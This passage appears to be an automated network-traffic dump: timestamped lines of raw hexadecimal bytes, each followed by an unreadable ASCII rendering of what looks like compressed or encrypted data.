ef de 1b e1 bb ef 75 2b e4 95 fb 6e 7f 3d d5 5c 03 e6 82 65 dd 78 41 d6 7d 72 86 93 95 a7 4b 64 5d 1c 90 98 ad f2 9e f3 0f dc 91 5b ca 3f 2e bf bc 7b f6
                                                                                                    Data Ascii: 9VjeU~*jD"Np=_833rRx98[hu\w@UZ`>-s!@&8|nzslszq)=ybSN+lSn1u}hgnvFE<p.}i1H{r!j1{bu+n=\exA}rKd][?.{
                                                                                                    2023-10-24 04:55:22 UTC942INData Raw: 3a e4 6c ac e2 e3 8b 89 ca 80 d3 d1 44 f4 f9 78 6a 25 c0 36 00 2c 0f 60 7a 80 7d 07 b0 93 00 3b 7f f6 8d 7c ec b7 56 f9 58 f4 f9 05 5a ab 7c 2c 6a 3d 7e 06 27 51 6e 48 83 35 9c 44 f5 e4 b2 88 8c 44 f5 e0 b2 88 cc 5a fa 72 59 44 46 a2 de e7 b2 88 1a 4b 84 31 8c 93 a8 51 5c 16 11 d7 b2 7c f8 db b3 88 e0 6f f4 61 68 a5 71 d5 56 b1 f6 57 04 f3 38 7e 29 51 79 f8 4c 34 31 e2 42 3c 35 e5 4a a4 34 e0 5c ac 22 1a 60 0b 01 b6 01 60 69 00 5b 07 b0 14 80 6d 02 98 11 60 7b 01 f6 f5 b9 37 6c 72 76 2b 9b bc b2 95 4d 5e d8 ca 26 87 b6 b2 c9 33 5a d9 e4 49 9c 4d b6 44 fe ce ad 22 7f 5c cd 4b 6e ff 12 eb be ff 86 cf e5 5e 54 f9 01 99 ae 51 dc ca 72 b7 af 4b ed 2f 1a 09 7c 8f 9f 61 2f 52 9c ce b6 48 23 a3 b3 99 68 82 7a 97 ce c6 93 52 4f f4 76 c6 da 31 43 32 87 6f c9 fe 58
                                                                                                    Data Ascii: :lDxj%6,`z};|VXZ|,j=~'QnH5DDZrYDFK1Q\|oahqVW8~)QyL41B<5J4\"``i[m`{7lrv+M^&3ZIMD"\Kn^TQrK/|a/RH#hzROv1C2oX
                                                                                                    2023-10-24 04:55:22 UTC949INData Raw: 4c bc 65 0a b7 c3 d3 08 38 8f 2d 8d dc 3c f4 8f 35 79 db e1 be 69 03 91 f6 69 3d 8c 6e 83 e7 b7 f8 61 b1 3f 81 1f 16 7a 08 e6 f6 e4 fb a9 a8 db 17 ed a4 95 53 52 c6 19 a3 3a 9a ea 50 03 cf 63 a4 4c 72 d3 af ab 9b 31 b0 2b 93 a1 8f 9a c6 64 e8 13 33 41 e7 fc fd 8b 40 21 74 fd 01 6c f7 c7 86 87 87 66 a2 24 3f d5 cb 15 53 7d 87 c0 cc 53 87 b2 d9 3c 6d 75 f3 ba 2e 72 85 6d 9f 52 c7 bf a6 32 cf 76 c8 80 67 7f 3f 09 cf de 3f 8a 5e 90 99 c7 b3 9b 91 c7 3b 8b 3a 1d c5 0c c6 c3 83 a0 f9 45 d6 f1 d1 f8 eb e1 11 91 51 d1 73 e7 cd 07 4f d0 24 05 7f 03 e3 c1 28 21 17 0f 1e fc 04 df b6 56 35 b7 a0 f3 d6 d0 d0 c9 8f f5 b3 85 80 15 e3 55 4d 59 08 58 e5 48 36 0d 2f ba c7 c6 c9 55 cb a4 66 1b ff ac f1 9b e2 66 a2 a0 6a e3 ac 52 0f cc 79 e0 b7 89 9a f6 12 a9 60 62 c0 82 cc
                                                                                                    Data Ascii: Le8-<5yii=na?zSR:PcLr1+d3A@!tlf$?S}S<mu.rmR2vg??^;:EQsO$(!V5UMYXH6/UffjRy`b
                                                                                                    2023-10-24 04:55:22 UTC957INData Raw: 86 cf ad 69 92 25 57 74 91 7f 95 e6 84 c4 bd a9 d8 bb d1 9c 2a 2f ac 00 14 b3 b0 2f cf f4 ba ca 7a 7e 70 e0 77 b0 82 f3 96 3b b6 8d 51 fa c5 e2 c9 e6 94 90 e2 1d 22 f8 ac 21 65 7e 38 ef e3 f7 86 10 83 95 2e 88 d0 c6 4d 42 75 5b f0 c4 7f a8 67 e9 6f 42 6c 31 4d 5e 46 95 94 55 81 55 e9 e7 d6 a9 85 22 ec 45 fd 4b ed a1 30 e1 de 90 7c 88 41 2e db 2e ea e2 27 8a 8b 26 d0 75 13 58 47 a0 bd 59 4f 35 77 7b b2 4e bd 46 fb 6e dc 93 fb 26 3b f6 a4 ad 5c fa 3b 5e 60 99 c4 dd d6 40 a1 f2 1b e2 d8 01 ce 06 c2 a3 33 d9 a0 9a 88 32 92 0d 52 9e c0 6c d0 fd 03 98 0d d2 f5 b6 dd db 1f c1 e9 07 5f b1 cd 82 93 3a 29 5d 97 46 df 57 5d 55 b9 c5 f9 bb 15 ba 5b bb 15 2d 3d 5e ee 29 bb e0 ec 7b 40 14 14 80 7a ea b0 88 52 46 4f bd f8 1b 7d 3f ab 6b 3b 1b 3c f6 fb 9f 0a cb a5 ec 2f
                                                                                                    Data Ascii: i%Wt*//z~pw;Q"!e~8.MBu[goBl1M^FUU"EK0|A..'&uXGYO5w{NFn&;\;^`@32Rl_:)]FW]U[-=^){@zRFO}?k;</
                                                                                                    2023-10-24 04:55:22 UTC965INData Raw: f9 b0 6e 3a fc 6e 09 65 0a 9b 6f ad 3f a5 d0 2e 31 ee ef 1d 6f ae 95 b0 d4 86 c8 79 2b 7a cc aa 8e 8d 32 43 0f 61 da 46 e7 f0 de f6 65 38 bc 45 be 2e 1c de 9f c6 8d e4 f0 ba 7c 47 e1 f0 b2 fc 46 e3 f0 58 7e ce 1d 51 3d ee 27 70 78 5f ac 77 e5 f0 3e b0 d1 1c de d4 7d 34 87 b7 9c e6 f0 c8 dd 2d a6 da 37 f4 c9 eb a7 32 31 dc 91 f2 53 0a 7d 96 3f 72 5a 98 a3 6a eb 22 f8 8d 8a 13 66 f9 d4 7e bb 72 b8 1f 72 6f 12 51 03 b9 7f 65 c1 18 d3 96 06 31 e6 58 d7 59 65 4e 3c 5d 46 c1 9a 13 c6 4a 65 ce 5a d0 ce a6 17 05 7b c7 1b 2e 40 7c ff fd 0c b0 ac 94 4c 2a 33 a5 be a8 8d 8b a1 6b b5 74 07 16 8a 6a 22 4c 97 00 9f 2f 99 01 bb 69 af 52 4e 59 36 2e d4 27 bc 00 38 d9 7a 09 ce d6 2b 73 ca 65 9c f3 41 a8 03 75 f4 d3 5a 7a 57 5f 2d 32 e5 0b d1 5b 21 52 f2 4c 76 20 a5 52 5b
                                                                                                    Data Ascii: n:neo?.1oy+z2CaFe8E.|GFX~Q='px_w>}4-721S}?rZj"f~rroQe1XYeN<]FJeZ{.@|L*3ktj"L/iRNY6.'8z+seAuZzW_-2[!RLv R[
                                                                                                    2023-10-24 04:55:22 UTC973INData Raw: a2 cc cc 70 d6 a2 28 5d 6b 51 4c 4d 74 2d 0a 3b 13 6b 51 ce 8f 77 a9 45 f9 58 30 f4 d4 5a 14 7b e0 a3 e1 5a 94 09 7c ba 16 85 e5 33 e8 a8 45 b9 ec 3b e4 a8 45 a9 82 d5 ff dc 5a 94 e7 a2 39 32 de 0c d5 8f d6 a2 34 37 fe eb 5a 94 75 45 23 6a 51 ae 44 b2 c4 ec de 50 17 d6 c5 76 90 ae 45 61 4d 46 d6 a5 5f f3 23 b5 28 b7 97 ba 44 23 1b 44 ce 68 24 76 0a 8f 4c b6 f6 c2 58 af 40 d0 19 74 c6 98 03 f6 e0 ac 44 10 af 32 de 5c 71 91 a9 e4 32 0d 90 c9 18 23 66 3b 7d ef 3a db c9 cf 65 b6 d3 b6 9f 3e db c9 6f 12 a0 63 ef 30 d7 d9 4e 8b 96 ba cc 76 7a 7b 78 b6 93 25 fa e9 b3 9d a8 97 9e 3e db c9 be 64 f4 d9 4e e6 50 73 04 57 97 26 d7 67 7b ab b0 e2 06 a7 90 32 b3 ac 60 3f d3 f1 8b 13 7f 74 66 8e 33 de 33 a6 49 0c b7 ea 51 3b bd be 32 a4 ed 31 cb ba 28 1a 2c eb 4c 25 f6
                                                                                                    Data Ascii: p(]kQLMt-;kQwEX0Z{Z|3E;EZ9247ZuE#jQDPvEaMF_#(D#Dh$vLX@tD2\q2#f;}:e>oc0Nvz{x%>dNPsW&g{2`?tf33IQ;21(,L%
                                                                                                    2023-10-24 04:55:22 UTC981INData Raw: c6 5e e3 ba 04 f0 7d a3 d4 05 8e 09 db 6c 79 9b 66 b1 7b f9 51 15 e6 a4 5e 4c 66 a1 69 0a 17 46 38 81 ff 72 15 8f 77 5d 21 74 7b 59 73 07 f8 3b e1 eb af 6c 9b ad c9 11 b7 4d dd ab 92 d0 ea b5 fb ba 15 78 db aa d7 3b 65 42 f5 1c 95 3f f8 6f 6b 4f a1 ae cf 49 bf fa 80 34 db 3e 83 fa 80 e2 97 87 ab 0f 58 c6 31 37 a8 0f 58 f9 d2 33 d7 07 d8 d8 9a 18 d4 07 14 af 79 f6 fa 80 2f c6 f5 1a d4 07 2c 5c 3d a0 3e c0 75 b4 ae 3e 20 a9 63 ca 42 18 d9 03 cf 02 89 c9 a2 6a 69 fc 6c ba 67 97 6d 2f 83 aa a1 8a 91 a9 b0 62 04 46 87 53 c0 b3 10 5b 77 55 52 6f 86 26 35 5b a7 19 d6 02 fc f0 52 36 61 31 97 a9 05 00 56 15 9c d8 35 d7 9a c7 3f 6f 6e 03 6e 7a f0 19 aa 12 a8 8f f4 33 54 79 67 1e 73 da 1a a8 cb 91 0e e0 09 0e 3b 43 f5 f0 e9 27 03 67 a8 b6 c5 12 aa 24 b1 6f b2 e3 2e
                                                                                                    Data Ascii: ^}lyf{Q^LfiF8rw]!t{Ys;lMx;eB?okOI4>X17X3y/,\=>u> cBjilgm/bFS[wURo&5[R6a1V5?onnz3Tygs;C'g$o.
                                                                                                    2023-10-24 04:55:22 UTC988INData Raw: 3f 16 53 68 3d 7b 9f e9 89 fa c7 ee a4 df 94 a1 bd fa ea ea 35 9f c2 3a e6 3e b6 da 69 ee 47 a8 ae ed 09 5f 9b 3b d8 15 75 d7 17 c8 b0 dd d6 50 86 05 09 16 41 ff 6d d2 2b 0f e0 99 e6 39 03 bf 11 56 7c a5 8a 97 66 b8 de e9 c3 92 1d d4 9e 29 9a c4 de 76 b7 2e b6 02 cf ef 68 0f 0f 9c 69 b7 28 bf 2d e9 b7 4e 8f 9d 5d 09 b6 7a 19 b6 fd 89 29 3f 56 4d 37 69 32 c1 13 ad 9d b1 63 f5 27 be dd dc df b6 09 58 0f 8a c8 ae 08 cb 7d de 19 ed 29 8f f4 75 e5 23 60 86 41 e0 c3 0e f2 2b 58 d9 9e f4 40 5f d9 7e fd 68 2f 5f 23 68 ee ca 7a a0 22 b6 ab d3 cc d9 ca 8d 93 9f 9a 12 e1 c9 6b ad 9d 3a e5 b0 7b 5c 3f ad f1 a8 33 fe f7 ae a8 47 bd b7 b8 7a ad 31 1b ac d3 65 66 9a f1 60 66 a6 09 ca 83 3f c1 07 72 cd 6c e1 a7 30 7f a8 52 dd 87 59 99 ea b4 cb 2b 06 31 52 9b 2d da 18 e9
                                                                                                    Data Ascii: ?Sh={5:>iG_;uPAm+9V|f)v.hi(-N]z)?VM7i2c'X})u#`A+X@_~h/_#hz"k:{\?3Gz1ef`f?rl0RY+1R-
                                                                                                    2023-10-24 04:55:22 UTC996INData Raw: a3 77 33 42 07 09 11 d4 83 43 e5 14 89 e7 63 d0 ce 16 e8 63 d1 f0 2d 9f 27 7e f8 32 8f 83 c3 4a 29 ed ad e2 c6 b7 2a e4 ac e4 ad fa 3c 8b 10 a6 94 6e 2c 1f ea 06 93 56 c2 1b a4 23 e4 8c cd 80 70 b3 c7 5f e6 d2 44 7c 51 35 63 9f 22 24 8b 34 7e 5f 01 b2 dc f4 d1 fa 78 8a fe 34 8d 27 46 b8 99 31 42 60 c4 dd 4e 8f ac 9f 9a 69 b2 1a 9b f3 65 0e e5 10 50 58 09 3c a7 21 28 b6 1f 7a 49 e0 b1 e4 92 6f 52 b9 62 84 9b f5 cb 69 33 da 01 9b d3 26 08 32 8c be 0a 68 c2 2f b0 b6 be 8e 89 56 ad e2 75 7c 91 45 d8 47 6e 91 d4 6d 2c 54 50 c4 ef 23 73 18 ec d0 e8 8e 18 aa c3 0c a8 2e 8e 78 fd 9b fe b9 56 90 1b 9d fa 53 9d 23 fc be a7 64 9e 85 f1 cf 7c 99 4d 3a 46 29 f2 4b 9f 4e 75 62 86 ea 96 eb d1 3c 86 9e d7 c2 bb 8c c0 1f 7f 6d 54 33 3a 14 ad 89 43 9b 1a 8c 31 41 61 5c 69
                                                                                                    Data Ascii: w3BCcc-'~2J)*<n,V#p_D|Q5c"$4~_x4'F1B`NiePX<!(zIoRbi3&2h/Vu|EGnm,TP#s.xVS#d|M:F)KNub<mT3:C1Aa\i
                                                                                                    2023-10-24 04:55:22 UTC1004INData Raw: 61 95 39 f8 6b bf cc 67 bf c7 b7 ea 7a 8c c0 ef 90 a9 60 fe 5b dc 51 1c d6 b1 41 da 52 30 fb a7 ba 4c ae 97 2e 8a 55 1f d5 c9 f5 38 d3 60 1a 1d 83 ba ea d2 09 45 f2 1a 36 36 0e 75 08 f5 4a 90 16 ca 18 1b 6c 57 00 66 b5 d9 9a d1 73 ba b6 03 5e 57 2c b0 58 cb fb d1 77 61 2e 7d 59 8f 69 0d e8 59 31 d1 e5 7f 6c 32 c7 05 5a 1b 90 6e db b9 03 c9 8a de 16 84 0b 7c e8 91 fd 50 b8 40 98 75 26 59 6a cf c7 1a 7b 11 2e 90 b8 13 e1 02 27 5a 11 2e b0 a2 45 8f 0b a8 06 c7 05 1e fd b9 2a 65 05 f7 f4 d3 be ea eb 4c f5 12 d4 af f2 bf 6a 5f 45 d6 fd b4 af a6 46 53 ed 0b 75 b3 34 d3 be 60 c7 c7 47 a0 7d b5 d9 59 d4 be 1e fc 95 83 69 5f f0 6c 78 aa 07 c7 14 1e fd 79 3e 04 4e e2 1d 0f f1 10 31 da e5 ad 40 87 ab 1c 12 1e c1 cf 92 f6 e9 8b b7 70 10 fb 77 e1 00 79 22 f1 25 a5 c5
                                                                                                    Data Ascii: a9kgz`[QAR0L.U8`E66uJlWfs^W,Xwa.}YiY1l2Zn|P@u&Yj{.'Z.E*eLj_EFSu4`G}Yi_lxy>N1@pwy"%
                                                                                                    2023-10-24 04:55:22 UTC1012INData Raw: d8 56 7b 85 d6 dc 73 c3 ae 7f 7b 9f 6d 37 ac 25 8a d3 1e 00 f7 c8 cf 76 d1 3e b0 7e a1 6e 4b 7e 6f 4a cd cd ad bb 97 79 2a 75 fb 59 b7 b6 db 75 41 ab eb c3 e6 f0 c0 da ef 20 9e 4e 6d 09 7f d6 3b 2d bd fb 0d af d1 78 73 c4 5c 8f d6 75 ab 1a c8 d9 8d e1 6b c0 5a f1 60 18 bf 38 fb dc eb cb e3 a3 d4 64 43 4a fc 39 70 86 d2 1a 1d 03 84 eb aa 97 d5 9d ab 8b 0f 68 8e 8a 6c 38 a3 f0 68 e0 af 4c 4d 4d b5 cf f7 70 c2 1a cf da f8 f8 52 74 dd e9 de 9f d9 1c a2 f5 e7 92 1f 1d 30 ab f9 fb ac b8 f9 80 3e 98 67 d7 a0 67 57 ea 9e 4d 6c 14 ac 4d 4b b5 7f 16 3d 7b c5 87 79 b6 d5 f8 ac e3 27 e8 d9 64 7e d3 a8 96 bf c1 ac ba c0 0e ee 74 d1 3e d1 7e 15 ac cb 3c b0 d3 2d d5 41 f5 27 0b 4f 8c 20 ec ce 7f 76 97 25 16 9d 7e a5 ee 8f 6a 8f ba 8e 93 8d 41 19 2d 13 c9 f4 d2 ce e4 c6
                                                                                                    Data Ascii: V{s{m7%v>~nK~oJy*uYuA Nm;-xs\ukZ`8dCJ9phl8hLMMpRt0>ggWMlMK={y'd~t>~<-A'O v%~jA-
                                                                                                    2023-10-24 04:55:22 UTC1020INData Raw: 88 76 bc 9b 23 60 fc e5 f9 b9 b5 63 f5 f1 ac a3 13 3d b1 8a 09 59 38 96 71 0e 0e cb 2d ab 0e ab 29 ac 42 3b fb 97 93 5f 82 9c 51 0d 87 7f b5 42 59 28 af b3 13 24 b1 69 b8 5a d1 79 ee a4 6a c5 e5 f4 7e 18 7d 16 9d cf 14 53 b8 b3 8e af f5 f8 9d fb 9c 08 f0 15 8b f0 78 60 3b 59 a2 28 cd 53 e4 d6 2a 6a 5f 81 2f 7a e9 25 ff e7 64 2f 14 d2 41 04 de 4b 0c 3d 4d 91 64 32 5f bf 27 1b 63 e6 19 df 0f cc f8 29 e5 0a e4 03 b8 13 f3 26 70 95 08 d2 e8 2c b0 ed 2b 6d 52 48 1b 2a 83 79 c0 c9 08 11 95 4e 9f 84 7f ab 3f 0b 99 34 46 33 da 63 f1 18 55 57 46 ff 66 8c 62 57 64 32 c3 25 32 e2 cd 55 e9 f4 b1 17 63 b8 8c 77 52 c9 bc c2 4c 26 a7 2e 94 58 d9 0c 7a 0f cf f6 35 86 93 47 1a a3 99 a5 ea 50 a2 44 11 49 17 d4 c6 72 4b 9b c2 c9 cb 20 3f cb 8e 50 e2 7a 5c 3a ed b3 31 9b 8b
                                                                                                    Data Ascii: v#`c=Y8q-)B;_QBY($iZyj~}Sx`;Y(S*j_/z%d/AK=Md2_'c)&p,+mRH*yN?4F3cUWFfbWd2%2UcwRL&.Xz5GPDIrK ?Pz\:1
                                                                                                    2023-10-24 04:55:22 UTC1027INData Raw: 62 76 3b 5c 08 1d d8 00 23 68 2e 19 0a 39 bb 1a a4 3b 18 34 80 76 60 83 76 be 0a 1e a2 7b 66 ef e5 e1 bc b7 48 0a bc 9f d6 b6 ca 7e f7 ae 20 5a f5 92 ba d5 92 50 ce d7 e7 c4 6b 1e d7 4b 34 67 50 6d ee 6b 60 27 e9 35 a7 2c 98 fd 2c 78 83 a0 02 9d 1f d7 bd 68 db 42 19 31 fa 72 f4 28 aa b3 f6 59 7d f5 b0 18 f5 2a be 76 18 61 8b f5 16 0f fe 3d 4f 80 38 5b c3 e1 df 97 5b ee 2a 17 b5 37 cd 64 eb 45 cd bb 02 c9 5a 8f ce b6 24 81 c2 ae 69 b7 54 54 67 b7 f9 84 29 f5 1f 1a 2c 57 84 f7 a1 0d f0 bd 66 8d 0d 66 ac e3 9e 93 ad 4f 9a bb 25 da 33 80 64 5c 0e a5 04 f6 2c fa f3 3e 40 41 ae 87 e3 62 5c 17 6b bb 1f 29 29 a7 01 8f 63 69 33 ed 44 1f 0c 00 a6 f1 3c fe 33 fc ba 0c bf ba c3 07 9c 0e 06 6f eb 12 6b 3e 1b 41 ec 4e 32 1f 67 c9 9f be e7 5b f1 73 b1 fb f3 67 d0 8a 36
                                                                                                    Data Ascii: bv;\#h.9;4v`v{fH~ ZPkK4gPmk`'5,,xhB1r(Y}*va=O8[[*7dEZ$iTTg),WffO%3d\,>@Ab\k))ci3D<3ok>AN2g[sg6
                                                                                                    2023-10-24 04:55:22 UTC1035INData Raw: 94 96 33 9d 72 57 84 d6 e9 ce a4 98 7e b0 02 ad 2f cc a3 83 2c 31 6a 61 3b 29 3c 82 d3 fa e2 66 91 ae 25 d0 f2 50 d2 aa 73 f8 2c dd 8f bf 46 3b de 24 c9 3d aa f3 7b 76 59 8e ad 1a 55 df 15 2a ed f1 7a fc 6d c2 ec 3d 43 fe c0 a3 62 41 3a 6d ee f3 86 b9 6d cb 49 ec 71 f8 7c 67 11 bc a3 2b e4 b6 29 87 73 cd 8f 39 35 e3 7c 28 25 bf 48 f3 b8 7e 89 2e e1 94 7e c0 fc b3 4b 20 bf 88 53 7a 49 77 c2 36 ec f7 6f 98 95 45 9a b1 26 bc 8f bf dd bb 44 1d b3 d1 64 9a af 89 28 ed 6c 64 72 2a d9 bd fb d3 e2 6f be 49 e3 3d ec 23 cf e3 8d f6 8f 95 94 f7 e2 86 a5 9a 07 8d fa c4 4f ba 2e 77 8e d8 bd 75 85 1e c2 ab 64 e7 1c bf a6 ba a4 7f ed 4d f9 f2 a4 80 12 92 a6 2b 97 9a 32 7d a9 7f 35 78 9c 4a 41 2c f6 b0 b7 b1 cf fb 19 c6 b2 ee 91 61 c5 c9 06 af ec 4d e1 d1 ba 58 38 b6 5b
                                                                                                    Data Ascii: 3rW~/,1ja;)<f%Ps,F;$={vYU*zm=CbA:mmIq|g+)s95|(%H~.~K SzIw6oE&Dd(ldr*oI=#O.wudM+2}5xJA,aMX8[
                                                                                                    2023-10-24 04:55:22 UTC1043INData Raw: 8d e1 c0 b2 ce f9 c8 bf f0 a5 7b 7f e3 a3 fe 95 f2 39 fb 1f e8 27 ba 66 68 83 3f c7 31 5b 94 ea 2a f7 30 db 76 86 50 5c 66 28 1a de ad f7 be 4b 19 f9 0e f3 be 7b e8 ce bb 6b 61 ab b1 ed e7 69 f5 a7 21 2c 27 5c 63 9f b8 25 62 83 54 90 b0 15 5d 81 23 f5 b6 08 70 6c d3 65 54 17 49 eb 4e 01 e0 f1 d5 7f ca 2f ee 40 ed 80 9d 7d fb f4 e9 38 b1 b3 21 05 d0 70 41 3b ff 15 9d 18 11 fa 4c 43 f3 6f e8 6b 25 5b 7f 77 db 8e e0 60 a4 37 ab ee ff f6 9e 7e a2 e7 45 86 04 76 e2 b9 76 9b 6c bd e0 59 f0 3e ee 4d db 7a a9 a8 e3 39 94 f3 29 64 0f b8 ad 5a 00 2b ef 0a 1f d5 7b 5d 7e aa 3b aa 3b 3b f9 f6 e5 c9 24 35 84 c3 50 6c f5 fd 7d e9 0e a2 b1 3e 96 f1 18 5a 85 33 62 8e 25 af eb cc 20 5b 0b e0 a9 30 ad b3 9c 40 7a 4c c3 f6 21 3d e6 ce 73 ee d8 63 21 28 e2 e7 cf 1c cc ab 58
                                                                                                    Data Ascii: {9'fh?1[*0vP\f(K{kai!,'\c%bT]#pleTIN/@}8!pA;LCok%[w`7~EvvlY>Mz9)dZ+{]~;;;$5Pl}>Z3b% [0@zL!=sc!(X
                                                                                                    2023-10-24 04:55:22 UTC1051INData Raw: 7a b3 b6 40 2f ab e3 5b 8e 64 89 6d 7f 25 15 e3 56 e5 e8 cd ea 7a b3 d9 a5 80 9e ad 2d 02 59 a2 87 76 8c 6c e5 31 f8 2f 22 a6 2c 5d 63 b0 2a c4 6e b5 d5 c3 e1 1c 5b a0 34 ab 60 a8 24 d9 52 ad 52 e1 62 23 52 6b 11 3f 8a 2e 81 a6 98 e5 89 72 87 ce 6a 65 1f fc c7 06 fc 45 46 48 e3 ef 22 c9 e0 9d 9d a1 ec 3d f7 24 92 a1 c5 1a 9b 56 66 26 09 ea 9f 9c 88 8d 44 bd 6b 36 a3 5e 5b f0 26 b4 72 a6 37 97 3c 87 d2 be 29 bd 41 a7 b3 e2 54 d8 60 0a ae 30 af ce a0 51 d7 63 5c b2 d4 04 8b ca ad 63 12 61 ed ab ea bc a5 21 cc 6a 38 f8 bf 4b 43 18 2e 3a b1 c6 00 5d e3 44 dc 05 7b f6 2d 98 1b dc c6 a7 31 2f 66 05 8e b8 af 0c 0f 57 39 c4 4e ad ca 02 f2 39 5c ed 1c c4 f7 f0 54 62 70 d8 e1 5d a8 da 29 b1 6b ab b5 b1 4a bb c8 a1 51 d6 cb 64 59 29 19 22 9d c1 a2 0d ad b3 26 01 b7
                                                                                                    Data Ascii: z@/[dm%Vz-Yvl1/",]c*n[4`$RRb#Rk?.rjeEFH"=$Vf&Dk6^[&r7<)AT`0Qc\ca!j8KC.:]D{-1/fW9N9\Tbp])kJQdY)"&
                                                                                                    2023-10-24 04:55:22 UTC1059INData Raw: a0 c4 5c 21 50 d4 3f 12 28 ed d7 09 94 af af 12 28 f7 6f 11 28 dc 4d 02 e5 b1 6b 04 4a ca 6d 02 45 fb 23 81 b2 f7 3a a1 5d b0 99 18 0e 58 97 7f 6a 6c 64 7f 9e 4c e8 a9 3c e9 fd d2 e1 6a e7 a6 46 aa f4 e5 e6 d2 5e af fd f3 01 a1 f4 ab 70 06 85 b8 ee 40 bf 63 a0 90 c9 21 c4 f8 8e 80 ee 73 0d f8 e4 8f 43 f8 24 7c 17 e5 51 bc 5c ab 54 ab ac 24 0b b8 84 70 e5 41 91 10 09 e5 9f 1c 9d 18 53 5a 5e 59 12 ae b7 19 6a 6a df cd 91 1c 04 69 7a f8 41 bf 72 56 95 be 12 ed c6 e3 b7 0b 07 78 39 e1 6b b7 84 5c ce 71 bf 65 8b 45 3f e5 d3 6b 7f 2d e6 df 92 4a a8 4f 3f 2b 64 b7 6c 59 27 de 66 dd 44 bf ba 35 82 77 dd 16 47 cd 0c 2f 62 03 63 73 c4 ff ad dd 44 7f bc 4d ce 77 19 37 50 5f 58 c3 d8 dd f0 ec fd 67 32 68 26 49 ce ef 9f 19 4b 7d f8 df 22 76 6d 42 8e 58 1b 5d 40 af d8
                                                                                                    Data Ascii: \!P?((o(MkJmE#:]XjldL<jF^p@c!sC$|Q\T$pASZ^YjjizArVx9k\qeE?k-JO?+dlY'fD5wG/bcsDMw7P_Xg2h&IK}"vmBX]@
                                                                                                    2023-10-24 04:55:22 UTC1067INData Raw: 25 56 a7 95 5b 6c 26 9b e2 7b c0 a4 01 f0 62 79 00 93 7e e9 a6 e4 b2 6a 2b 5a 9f c1 9f 65 8b cb e1 6b 95 c3 7d ad f7 f6 92 6f 47 15 71 5b 01 8a ed 81 af f9 0e f1 a9 62 d7 c9 ad 80 49 27 d7 e2 07 32 6b 94 7a d8 0f e4 6b 4d cc 70 99 35 53 89 bf c9 ee 0b 2a a8 54 48 a8 4f 03 8a 06 d5 fc 14 f8 e5 51 9f 06 16 b1 7f 05 e7 88 5d fc 0b 68 36 48 ce 77 81 b6 3e 2a 28 f3 81 5a 37 ac f9 a9 31 c5 90 9a 9f ca 49 d9 7d 35 3f 6b 2f 27 93 5a b7 d9 0e d9 a4 d6 6d d1 d1 4c 76 d3 bd 64 b1 f2 7c fa b0 b5 6e 5a 6b 0a a9 75 9b bf 2b 89 cd 99 91 3b 6c ad 5b d4 bf d2 e9 a4 37 b3 fb 6a dd 1c 17 a7 f4 d5 ba 4d fa 2e 95 d4 ba 75 fb a4 0c aa 75 9b 19 95 c5 1e 7e 2d 99 d4 ba 3d 3a 43 f1 bf d6 ba dd bd 92 2c 0e bb 99 4e 6a dd 5e 0f c8 a7 0a fe ca 64 eb bb 93 fb 6a dd a4 dd a9 94 eb fd
                                                                                                    Data Ascii: %V[l&{by~j+Zek}oGq[bI'2kzkMp5S*THOQ]h6Hw>*(Z71I}5?k/'ZmLvd|nZku+;l[7jM.uu~-=:C,Nj^dj
                                                                                                    2023-10-24 04:55:22 UTC1074INData Raw: 4c 69 79 0d f7 a3 eb d8 fd e7 c7 51 30 bf 1a bf c6 4d fe cf 47 4e de e1 b1 e6 8c 03 f5 99 b4 29 6a f2 ae 1d 22 91 c1 af 25 7c 2a 68 e1 6b af 80 75 62 74 a7 19 94 1f fb de 9d 28 6d 1f 9b d6 32 a6 f6 d9 c8 95 bf b6 df c2 67 19 f8 cc bd f3 36 ca da b8 f7 26 33 9d 3f 36 86 8d 70 b8 7c 79 14 03 72 66 51 66 f2 93 39 71 1d 97 dc 8e c7 8f 97 84 27 db ae 76 c6 b9 36 69 3d d0 e3 b0 20 fe 99 db 70 2e 6f b6 c7 8c 73 db 76 d1 15 a8 f3 70 e8 7e c0 9a a8 6a a2 34 32 b5 d6 69 4b dd 78 ca 1c 80 12 76 4b 3b 68 23 4e 3f 8c 67 b9 67 8e e4 e4 e4 96 b5 06 55 dd 84 b5 b5 44 8e 76 1e 15 ea e4 7e dc 61 67 ca 7d 7a c4 38 e0 bb cd dd 85 c4 37 d2 38 b2 f9 a7 f2 9d 9b 3c f8 ba c2 53 94 74 42 b4 3f 57 33 ab 31 9c 69 da f5 0a ae 3c 8c 6f dc f9 1a d0 c6 c8 d8 c6 fa 0e 1a a4 78 7a 60 57
                                                                                                    Data Ascii: LiyQ0MGN)j"%|*hkubt(m2g6&3?6p|yrfQf9q'v6i= p.osvp~j42iKxvK;h#N?ggUDv~ag}z878<StB?W31i<oxz`W
                                                                                                    2023-10-24 04:55:22 UTC1082INData Raw: 90 79 3f a3 16 df 14 22 7f ed 75 06 7b 84 bd 55 98 e7 2f 8e f4 8c 1f 16 19 59 77 04 e6 5c b5 67 3e 78 78 87 91 09 e1 fc 69 d0 fc a2 e2 a0 ba 73 c4 4b 0b aa 37 50 a4 de 68 be 88 f5 46 7c 5c 4a f7 14 58 ab 86 a5 e3 fc 61 55 54 b5 bf 5d 15 83 ef 82 57 b0 64 84 c2 98 32 26 00 d6 16 a5 bd f8 51 cb 7f 24 8e 83 87 bf 14 80 3c 67 74 fa c8 2e 70 61 d2 0d a5 51 be f9 70 17 17 f0 73 60 a5 2c 6a b5 af 94 ca e1 f2 ac f4 34 ce 8b bb 6c 7a f3 0c cc 22 32 3d b7 70 6d bf 4e 44 c5 1e ba 06 be 80 3f bc 8b a8 d1 1d e4 25 84 c9 3d 64 af 34 f2 61 06 87 56 0b e7 d5 d6 8f 57 4a 69 be 36 d6 57 39 42 f2 44 46 07 fe a5 3a 82 18 91 36 26 fa 0c 31 5d d3 de 2c 90 d6 b0 65 65 f4 5f 8a c8 a3 1d 4a 2f 79 a8 ee 28 b2 ad 8e 34 5e 5d bf 56 66 dd 94 2b e4 af 5d 2d f1 dd b8 5e ee bf 26 5f 2c
                                                                                                    Data Ascii: y?"u{U/Yw\g>xxisK7PhF|\JXaUT]Wd2&Q$<gt.paQps`,j4lz"2=pmND?%=d4aVWJi6W9BDF:6&1],ee_J/y(4^]Vf+]-^&_,
